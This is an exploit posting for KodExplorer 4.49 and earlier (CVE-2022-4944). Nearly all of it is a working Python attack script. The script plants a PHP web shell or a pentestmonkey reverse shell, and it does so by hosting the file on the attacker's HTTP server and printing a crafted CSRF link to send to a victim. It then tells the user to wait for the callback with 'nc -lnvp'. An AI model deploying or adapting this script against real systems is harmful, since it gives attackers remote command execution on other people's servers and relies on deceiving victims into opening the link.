KODExplorer 4.49 Cross Site Request Forgery / Shell Upload

Credit: Mr Empy
Risk: High
Local: No
Remote: Yes

# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload # Date: 21/04/2023 # Exploit Author: Mr Empy # Software Link: https://github.com/kalcaddle/KodExplorer # Version: <= 4.49 # Tested on: Linux # References: # * https://vuldb.com/?id.227000 # * https://www.cve.org/CVERecord?id=CVE-2022-4944 # * https://github.com/MrEmpy/CVE-2022-4944 import argparse import http.server import socketserver import os import threading import requests from time import sleep def banner(): print(''' _ _____________ _____ _ ______ _____ _____ | | / / _ | _ \ ___| | | | ___ \/ __ \| ___| | |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/| |__ | \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | | __| | |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\| |___ \_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_| \____/\____/ | | |_| [KODExplorer <= v4.49 Remote Code Executon] [Coded by MrEmpy] ''') def httpd(): port = 8080 httpddir = os.path.join(os.path.dirname(__file__), 'http') os.chdir(httpddir) Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(('', port), Handler) print('[+] HTTP Server started') httpd.serve_forever() def webshell(url, lhost): payload = '<pre><?php system($_GET["cmd"])?></pre>' path = '/data/User/admin/home/' targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') wshell_f = open('http/shell.php', 'w') wshell_f.write(payload) wshell_f.close() print('[*] Opening HTTPd port') th = threading.Thread(target=httpd) th.start() print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// {lhost}:8080/shell.php&uuid=&time=') print(f'[+] After the victim opens the URI, his shell will be hosted at {url}/data/User/admin/home/shell.php?cmd=whoami') def reverseshell(url, lhost): rvpayload = ' https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php ' path = '/data/User/admin/home/' targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') lport = input('[*] Your local port: ') reqpayload = requests.get(rvpayload).text reqpayload = reqpayload.replace('', lhost) reqpayload = reqpayload.replace('1234', lport) wshell_f = open('http/shell.php', 'w') wshell_f.write(reqpayload) wshell_f.close() print('[*] Opening HTTPd port') th = threading.Thread(target=httpd) th.start() print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// {lhost}:8080/shell.php&uuid=&time=') input(f'[*] Run the command "nc -lnvp {lport}" to receive the connection and press any key\n') while True: hitshell = requests.get(f'{url}/data/User/admin/home/shell.php') sleep(1) if not hitshell.status_code == 200: continue else: print('[+] Shell sent and executed!') break def main(url, lhost, mode): banner() if mode == 'webshell': webshell(url, lhost) elif mode == 'reverse': reverseshell(url, lhost) else: print('[-] There is no such mode. Use webshell or reverse') if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-u','--url', action='store', help='target url', dest='url', required=True) parser.add_argument('-lh','--local-host', action='store', help='local host', dest='lhost', required=True) parser.add_argument('-m','--mode', action='store', help='mode (webshell, reverse)', dest='mode', required=True) arguments = parser.parse_args() main(arguments.url, arguments.lhost, arguments.mode)

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